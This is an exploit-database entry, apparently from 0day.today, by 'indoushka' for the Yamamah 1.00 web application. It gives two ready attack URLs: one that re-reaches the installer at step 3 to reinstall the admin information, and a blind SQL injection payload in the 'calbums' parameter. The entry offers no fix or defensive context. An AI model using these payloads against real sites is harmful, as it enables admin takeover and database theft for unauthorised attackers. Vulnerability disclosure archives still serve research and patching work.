id: 11517
date: 03/30/2010
title: Yamamah Version 1.00 Mullti Vulnerability
author: indoushka
cves: 

=========================================
Yamamah Version 1.00 Mullti Vulnerability 
=========================================

========================================================================================                 
| # Title    : Yamamah Version 1.00 Mullti Vulnerability          
| # Author   : indoushka                                                                                                             
| # Home     : www.dz-blackhat.com                                                                                                                                                                                                                  
| # Tested on: Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Mullti                                                            
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 (Reinstall Admin Information):
  
     1- http://127.0.0.1/yamamah_v1/install-/?step=3
      
     (Blind SQL/XPath injection):
      
    2- http://127.0.0.1/yamamah_v1/?calbums=1+and+31337-31337=0+--+



#  0day.today [2023-03-25]  #